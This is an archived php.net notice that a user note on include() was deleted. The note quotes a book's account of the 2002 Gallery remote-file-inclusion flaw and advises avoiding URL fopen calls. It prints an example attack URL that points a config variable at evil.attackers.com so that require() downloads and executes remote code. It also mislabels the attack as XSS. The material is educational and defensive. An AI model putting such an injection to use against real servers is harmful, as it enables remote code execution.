note 49931 deleted from function.include by aidan
| From: | aidan@php.net | Date: | Sat, 15 Apr 2006 16:36:27 +0000 |
| Subject: | note 49931 deleted from function.include by aidan | ||
| References: | 1 | Groups: | php.notes |
| Request: | Send a blank email to php-notes+get-108168@lists.php.net to get a copy of this message | ||
Note Submitter: dmhouse at gmail dot com
----
Adding to the statements made by durkboek A_T hotmail D_O_T com, remote includes allow for the
possibilities of Cross-Site Scripting (XSS) attacks. Quoting from George Schlossnagle's
'Advanced PHP Programming':
In late 2002 a widely publicized exploit was found in Gallery, photo album software written in PHP.
Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to
change the default base directory for the software. The default behavior left the variable unset.
Inside, the code include() statements all looked like this:
require($GALLERY_BASEDIR . "init.php");
The result was that if the server was running with register_globals on (which was the default
behavior in earlier versions of PHP), an attacker could make a request like this:
http://gallery.example.com/view_photo.php?
\
GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F
This would cause the require to actually evaluate as the following:
require("http://evil.attackers.com/evilscript.php
?init.php");
This would then download and execute the specified code from evil.attackers.com.
[...]
In his talk "One Year of PHP at Yahoo!" Michael Radwin suggested avoiding URL fopen()
calls completely and instead using the curl extension that comes with PHP. This ensures than when
you open a remote resource, you intended to open a remote resource.